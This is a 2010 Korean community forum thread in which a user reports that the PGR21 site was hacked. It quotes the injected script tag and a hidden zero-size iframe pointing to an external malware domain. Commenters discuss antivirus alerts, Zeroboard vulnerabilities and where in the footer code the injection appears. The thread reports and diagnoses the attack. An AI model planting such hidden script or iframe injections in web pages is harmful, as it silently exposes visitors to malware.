PGR21.com
- 자유 주제로 사용할 수 있는 게시판입니다.
- 토론 게시판의 용도를 겸합니다.
Date 2010/09/25 00:47:00
Name EZrock
Subject [일반] pgr은 왜 이렇게도 쉽게 뚫리는 걸까요-_-;;;
<script language=javascript src=http://69bar.net/js.js></script>

document.writeln("<iframe src=http://69bar.net/faq.htm width=0 height=0 scrolling=no frameborder=0></iframe>");


원인이 되는 페이지의 소스코드와(라인 7463) 그 안의 스크립트 내용입니다.

저번에는 원래 포함되어 있을 .js 파일내부에 문구가 삽입되어 있다면

이번엔 대놓고 스크립트가 실행되어야 할 부분이 직접적으로 들어가 있네요

저야 웹 보안과 크래킹 쪽은 관심이 크게 없어서 어떤 기법으로 이런 녀석들이 삽입됐는지 모르겠는데...

이 참에 웹 보안과 크래킹 쪽에 대해 관심이 생기네요.

일단은 제가 쓰는 Avast에서 걸리는건 이 부분 밖에 없어서 이 부분만 제거하면 좀 괜찮아 질지 모르겠습니다만...

포모스도 그렇고 pgr도 그렇고 너무 쉽게 어택을 허용하는 느낌이 드네요...

통합규정 1.3 이용안내 인용

"Pgr은 '명문화된 삭제규정'이 반드시 필요하지 않은 분을 환영합니다.
법 없이도 사는 사람, 남에게 상처를 주지 않으면서 같이 이야기 나눌 수 있는 분이면 좋겠습니다."
핸드레이크
10/09/25 00:59
수정 아이콘
저야 잘 모르는 부분인데 저게 무슨 문제를 일으키는 건가요?

크롬으로 들어갔을때 막히지나 않았으면 좋겠는데..
실버벨
10/09/25 01:04
수정 아이콘
저도 지금은 크롬으로 접속 중인데, IE로 접속하면 자꾸 바이러스 잡힌다고 더 이상 진행이 안 되서.. T-T.
Aeternus
10/09/25 01:04
수정 아이콘
어쩐지 그래서 아까 한동안 심하게 느렸었네요..;; 주소줄에 이상한 주소가 뜨길래 제한된 사이트로 차단하고
접속하니 별 문제 없어서..
지니쏠
10/09/25 01:06
수정 아이콘
피지알접하면 오류메시지 뜨면서 꺼지는데 그래서 그런건가요? [m]
10/09/25 01:08
수정 아이콘
저도 자꾸 그런 오류 뜨네요... 네이버 백신에선 자꾸 바이러스 잡히구요.
10/09/25 01:05
수정 아이콘
일단 저 스크립트 실행되면 저 페이지로 강제접속되고 거기서 개인 컴퓨터로 악성코드를 전송시켜버리는 녀석...이라고 밖에 제 짧은 지식으론 답변 드릴수가 없네요-_-)a;;;
10/09/25 01:16
수정 아이콘
제로보드 기반이라 보안에 많이 취약합니다.
저런 해킹의 스크립트가 서버에 박히는거는 꾸준한 모니터링 뿐이 없습니다.
영리를 목적으로 하는 기업형 사이트가 아닌 개인 사이트의 성격이 짙은 pgr에
일일히 시스템적 부분을 관리, OMS 하기에는 한계가 있죠
하수태란
10/09/25 01:16
수정 아이콘
역시나 V3은 쓰레기인것인가요 ㅡㅡ; 바이러스 경고 하나도 못잡네요

2007년이었나. 학교로 공격들어왔을때 카스퍼스키 설치해둔 제 컴퓨터만 무사했고
학교 라이센스 V3 이 깔린 다른 컴퓨터들은 다 퍼졌는데.

옥션에서 그냥 준 V3로 집에것 쓰고 있는데. 어떤 악성코드가 깔려있을까 걱정됩니다.
10/09/25 01:23
수정 아이콘
제로보드4 lib.php에 보면 function foot() { 부분이 있습니다.
여기를 살펴보면 게시판 설정화면에서 입력하는 footer를 먼저 출력하게 되어 있는데 그 내용이 </div> 뿐이고, 그 뒤에 바로 악성코드 스크립트가 붙어 나오네요.
그 다음엔 footer 파일 경로에서 지정한 footer 파일을 불러오게 되어있는데, 그 내용은 악성코드 스크립트 뒤로 따라 붙어 나옵니다.

설정푸터와 파일푸터 사이에 어디선가 악성코드를 끼워넣어주고 있는건데, DB상에 숨어 있거나... JS로 동적으로 넣어주고 있다고 봐야 할 것 같네요.

그럼.... 어디를 살펴보면 될까요?

아시는 분은 알려주세요 흠흠
10/09/25 01:40
수정 아이콘
와우 제거되니 속이 시원하네요 크크크크크
KillerCrossOver
10/09/25 07:02
수정 아이콘
아 이제 해결된건가요..ㅠㅠ

며칠간 추석이라 뜸하기도 했었지만, 광고오류랑 이 오류문제로 접속이 힘들었는데..
해결되서 다행입니다. 찾아내고 수정해주신 분들..고생하셨습니다. (__)
뱃살토스
10/09/27 12:19
수정 아이콘
요즘 접속이 원활하지가 않더군요.. 해결하신분들 수고많으셨습니다.
목록 삭게로! 맨위로
번호 제목 이름 날짜 조회 추천
25386 [일반] 존박-Coming Home 동영상. [15] 풍경5387 10/09/28 5387 0
25385 [일반] 비스트/성시경&IU/한효주(with 노리플라이)의 신곡과 보아의 M/V가 공개되었습니다. [10] 세우실4867 10/09/28 4867 0
25384 [일반] 안녕하세요, PGR 첫 글을 쓰게 된 취접입니다. [13] 취접3779 10/09/28 3779 1
25383 [일반] 국민의 알 권리 볼 권리는 어디로... [16] 전장의안개5310 10/09/28 5310 0
25382 [일반] [펌] 안원구 전 국세청 국장 [9] 모리5835 10/09/28 5835 0
25381 [일반] 내가 그녀를 잊지 못하는 이유 [4] 뜨거운눈물4484 10/09/27 4484 0
25378 [일반] 서버 불안정하니 우회 접속하세요 [6] Toby6224 10/09/27 6224 0
25377 [일반] 모토로이 한 달 사용한 스마트폰 초보 잡설. [22] 누가내치킨을옮겼을까5798 10/09/27 5798 0
25376 [일반] 임금체불건으로 노동부에 민원을 넣었습니다. 그런데 마음이 안좋네요. [13] Red Key5956 10/09/27 5956 0
25375 [일반] 프로야구 준플 티케팅 [24] 너구리곰4618 10/09/27 4618 0
25373 [일반] 누구의 잘못인가요? [10] 마르키아르5118 10/09/27 5118 0
25371 [일반] miss A의 신곡 "breathe"의 뮤직비디오가 공개되었습니다. [31] 세우실6126 10/09/27 6126 0
25370 [일반] 클럽에 추리닝 입고 들어가기. [48] The Warrior10892 10/09/27 10892 7
25368 [일반] 믿고싶지않아요.월요일이라니! [36] 오드림5409 10/09/27 5409 0
25367 [일반] 2010 마구마구 프로야구 9/26(일) 리뷰 & 개인기록 최종 순위 [31] lotte_giants4915 10/09/26 4915 0
25366 [일반] [EPL] 10-11 프리미어리그 볼튼 vs 맨유 , 이청용선발 박지성서브 [120] 느낌토스6611 10/09/26 6611 0
25365 [일반] 2010 마구마구 프로야구 준플레이오프 엔트리 [21] EZrock4261 10/09/26 4261 0
25364 [일반] 2010 마구마구 프로야구 중계 불판 [94] EZrock3582 10/09/26 3582 0
25363 [일반] 장재인양을 누가 잡죠?(수정) [126] 아우구스투스13516 10/09/26 13516 0
25362 [일반] 이주 노동자를 대변하는 코미디언 스티븐 콜베어 [10] 노힛4876 10/09/26 4876 1
25361 [일반] [MLB] 올해 킹의 성적입니다 + 잡설들 [16] 성철v4407 10/09/26 4407 0
25359 [일반] [MLB] AL 사이영 상은 누가 받아야 하는가? [65] The HUSE5733 10/09/26 5733 0
25358 [일반] [UFC] UFC 119 프랭크 미어 vs 크로캅- 크로캅의 부활을 기대하며.. [27] 파쿠만사4699 10/09/26 4699 0
목록 이전 다음
댓글

+ : 최근 1시간내에 달린 댓글
+ : 최근 2시간내에 달린 댓글
맨 위로